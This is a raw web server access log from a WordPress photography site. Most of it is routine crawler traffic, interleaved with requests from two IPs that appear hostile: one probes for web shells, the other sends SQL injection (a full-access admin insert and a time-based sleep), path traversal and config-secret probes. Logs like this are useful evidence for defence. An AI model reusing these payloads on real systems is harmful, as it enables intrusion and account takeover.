157.20.32.210 - - [18/Oct/2025:15:47:14 -0400] "GET /users;. HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:47:22 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fjs%2Fwidgets%2Fabout.php7&reauth=1 HTTP/1.1" 200 2364 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:48:04 -0400] "GET /products126430438?kg=0124888686 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:48:15 -0400] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:48:10 -0400] "GET /products126474754?kg=0124932460 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:48:28 -0400] "GET /workflow/servlet/pdf_servlet?JOBID=1'%3BINSERT%20INTO%20DOCTERA_USERS%20(USERNAME%2C%20PASSWORD%2C%20ENCPASSWORD%2C%20FIRSTNAME%2C%20LASTNAME%2C%20COMPANY%2C%20ADDRESS%2C%20ADDRESS2%2C%20CITY%2C%20STATE%2C%20ALTPHONE%2C%20ZIP%2C%20COUNTRY%2C%20PHONE%2C%20FAX%2C%20EMAIL%2C%20LASTLOGIN%2C%20CREATION%2C%20PREFERREDSERVER%2C%20CREDITCARDTYPE%2C%20CREDITCARDNUMBER%2C%20CREDITCARDEXPIRY%2C%20ACCOUNTSTATUS%2C%20USERTYPE%2C%20COMMENT%2C%20ADMIN%2C%20SUPERADMIN%2C%20ACCEPTEMAIL%2C%20ALLOWHOTFOLDER%2C%20PROTOCOL%2C%20BANDWIDTH%2C%20DIRECTORY%2C%20SLOWSTARTRATE%2C%20USESLOWSTART%2C%20SLOWSTARTAGGRESSIONRATE%2C%20BLOCKSIZE%2C%20UNITSIZE%2C%20NUMENCODERS%2C%20NUMFTPSTREAMS%2C%20ALLOWUSERBANDWIDTHTUNING%2C%20EXPIRYDATE%2C%20ALLOWTEMPACCOUNTCREATION%2C%20OWNERUSERNAME%2C%20USERLEVEL%2C%20UPLOADMETHOD%2C%20PW_CHANGEABLE%2C%20PW_CREATIONDATE%2C%20PW_DAYSBEFOREEXPIRE%2C%20PW_MUSTCHANGE%2C%20PW_USEDPASSWORDS%2C%20PW_NUMERRORS)%20VALUES('34eyb8myjwkg9incr0snsrk0smq'%2C%20NULL%2C%20'FAF63C22450EC8567DA3E232231E2EF5'%2C%20'34eyb8myjwkg9incr0snsrk0smqFirstName'%2C%20'34eyb8myjwkg9incr0snsrk0smqLastName'%2C%20''%2C%20''%2C%20''%2C%20''%2C%20''%2C%20''%2C%20''%2C%20''%2C%20'202-404-2400'%2C%20''%2C%20'34eyb8myjwkg9incr0snsrk0smq%40mydomain.local'%2C%201714014839723%2C%201714013661166%2C%20'default'%2C%20''%2C%20''%2C%20''%2C%20'full%20access'%2C%20''%2C%20''%2C%201%2C%200%2C%200%2C%200%2C%20'DEFAULT'%2C%20'0'%2C%200%2C%20'0'%2C%201%2C%20''%2C%20''%2C%20''%2C%20''%2C%20''%2C%200%2C%200%2C%200%2C%20''%2C%200%2C%20'DEFAULT'%2C%200%2C%201714014752270%2C%20-1%2C%200%2C%20NULL%2C%200)%3B--%20- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:47:18 -0400] "GET /RST_status.htm?x=1.gif HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/5.0"
157.20.32.210 - - [18/Oct/2025:15:47:22 -0400] "GET /toolbox-resource/../serverconfig.xml HTTP/1.1" 404 12359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
202.56.2.88 - - [18/Oct/2025:15:47:42 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:15:47:53 -0400] "GET /products60910416?kg=0060167689 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
202.56.2.88 - - [18/Oct/2025:15:48:01 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:47:56 -0400] "GET /products126487752?kg=0124945301 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:15:48:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760816896.6683869361877441406250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:15:48:17 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:48:18 -0400] "GET /workflow/ HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
216.73.216.159 - - [18/Oct/2025:15:48:19 -0400] "GET /products101941042?kg=0100697940 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.70.29.56 - - [18/Oct/2025:15:48:23 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
202.56.2.88 - - [18/Oct/2025:15:48:30 -0400] "GET /Njima.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:48:36 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
20.171.207.254 - - [18/Oct/2025:15:48:54 -0400] "GET /products60895054?kg=0060152514 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:15:48:53 -0400] "GET /general/status.html HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.11"
157.20.32.210 - - [18/Oct/2025:15:49:02 -0400] "PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:15:48:29 -0400] "GET /workflow/jsp/logon.jsp HTTP/1.1" 404 12360 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:48:47 -0400] "GET /etc/mnt_info.csv HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:48:49 -0400] "GET /wp-includes/customize/plugins.php HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
67.217.57.138 - - [18/Oct/2025:15:49:09 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:15:49:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760816958.5734589099884033203125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:15:49:14 -0400] "GET /alfanew.PHP7 HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
67.217.57.138 - - [18/Oct/2025:15:49:16 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:49:37 -0400] "GET /products54870582?kg=0054201510 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:50:03 -0400] "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1" 404 12359 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
92.222.108.110 - - [18/Oct/2025:15:50:07 -0400] "GET /products189053218?kg=0186747772 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.61.153.107 - - [18/Oct/2025:15:50:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760817014.4704320430755615234375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:15:50:10 -0400] "GET /wp-includes/Requests/Text/4price3.php HTTP/1.1" 404 12355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:50:34 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:50:47 -0400] "GET /images/atomlib.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:50:50 -0400] "GET /products87982096?kg=0086909225 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:15:50:56 -0400] "GET /products4457156?kg=0004402883 HTTP/1.1" 200 30201 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:15:50:55 -0400] "GET /products9069688?kg=0008959165 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:15:51:03 -0400] "GET /categories/12232966 HTTP/1.1" 200 29140 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
202.56.2.88 - - [18/Oct/2025:15:51:07 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:51:57 -0400] "GET /xx.php HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:15:51:59 -0400] "GET /products60891396?kg=0060148899 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:15:49:25 -0400] "GET /products54866856?kg=0054197829 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:49:31 -0400] "GET /products78169416?kg=0077216213 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:49:37 -0400] "GET /admin/login HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
202.56.2.88 - - [18/Oct/2025:15:49:50 -0400] "GET /wp-includes/IXR/themes.php HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:49:52 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
66.249.64.106 - - [18/Oct/2025:15:49:57 -0400] "GET /products11282958?kg=0011145442 HTTP/1.1" 200 29065 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:15:49:54 -0400] "GET /products60881424?kg=0060139049 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:15:50:03 -0400] "GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:50:19 -0400] "GET /internal/v2/config/mps_secret/ADM_SESSIONID HTTP/1.1" 404 12354 "https://salhab360photos.com/admin_ui/mas/ent/html/main.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:15:50:38 -0400] "POST /Synchronization HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:15:50:54 -0400] "GET /products60923790?kg=0060180898 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:15:51:04 -0400] "GET /products179029812?kg=0176846603 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:15:51:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760817077.9695699214935302734375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:15:51:14 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fmaint%2Fatomlib.php&reauth=1 HTTP/1.1" 200 2369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:51:33 -0400] "GET /wp-includes/fonts/plugins.php HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:52:14 -0400] "GET /products48428826?kg=0047838312 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:52:25 -0400] "GET /wp-content/plugins/wp-sec/ab.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:52:20 -0400] "GET /products76532978?kg=0075599732 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:52:45 -0400] "GET /content.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:15:53:03 -0400] "GET /products60942268?kg=0060199151 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:15:53:25 -0400] "GET /products11283200?kg=0011145681 HTTP/1.1" 200 29065 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.56.2.88 - - [18/Oct/2025:15:53:21 -0400] "GET /ioxi-rex.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:53:30 -0400] "GET /products7208256?kg=0007120433 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:53:36 -0400] "GET /products119089384?kg=0117637157 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:53:42 -0400] "GET /products95233160?kg=0094071861 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:53:48 -0400] "GET /products158713492?kg=0156778043 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:53:53 -0400] "POST /chat/completions HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
66.249.64.105 - - [18/Oct/2025:15:54:00 -0400] "GET /products11280904?kg=0011143413 HTTP/1.1" 200 28891 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.56.2.88 - - [18/Oct/2025:15:54:03 -0400] "GET /woh.php HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:15:54:10 -0400] "GET /products5378016?kg=0005312513 HTTP/1.1" 200 28947 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:15:54:08 -0400] "GET /products60925012?kg=0060182107 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:15:54:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760817259.1679310798645019531250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
34.192.125.239 - - [18/Oct/2025:15:54:13 -0400] "GET /portfolio/things-you-must-do-when-you-visit/ HTTP/1.1" 200 18591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:54:25 -0400] "GET /products167576840?kg=0165533301 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:52:05 -0400] "GET /products135579584?kg=0133926257 HTTP/1.1" 404 9798 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:52:11 -0400] "GET /products22785208?kg=0022507421 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:15:52:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760817137.5751490592956542968750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:15:52:26 -0400] "GET /products117712804?kg=0116277363 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:53:07 -0400] "GET /wp-content/themes/newstoday/lang.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:15:53:26 -0400] "POST /wp-cron.php?doing_wp_cron=1760817206.4714748859405517578125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
66.249.64.105 - - [18/Oct/2025:15:53:41 -0400] "GET /products13818266?kg=0013649832 HTTP/1.1" 200 28963 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.56.2.88 - - [18/Oct/2025:15:53:42 -0400] "GET /users.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
100.28.133.214 - - [18/Oct/2025:15:54:09 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
37.59.204.141 - - [18/Oct/2025:15:54:14 -0400] "GET /products162756224?kg=0160771473 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
202.56.2.88 - - [18/Oct/2025:15:54:22 -0400] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:15:54:23 -0400] "GET /products11499274?kg=0011359120 HTTP/1.1" 200 29237 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.23.180.225 - - [18/Oct/2025:15:54:24 -0400] "GET /wp-content/uploads/2019/08/travel-10-h.jpg?603685 HTTP/1.1" 200 2010075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:54:27 -0400] "GET /products83741876?kg=0082720715 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:54:33 -0400] "GET /products80904148?kg=0079917595 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:54:42 -0400] "GET /products100433468?kg=0099208751 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:54:45 -0400] "GET /products1533486?kg=0001514866 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:54:48 -0400] "POST /jtcgi/soap_cgi.pyc HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:15:54:48 -0400] "GET /products83692772?kg=0082672211 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:54:51 -0400] "GET /products139478674?kg=0137777796 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:54:52 -0400] "GET /4pric.php HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:55:00 -0400] "GET /interface-data/books-init HTTP/1.1" 404 10897 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Mobile/15E148 Safari/604.1"
20.171.207.254 - - [18/Oct/2025:15:55:10 -0400] "GET /products60883118?kg=0060140722 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
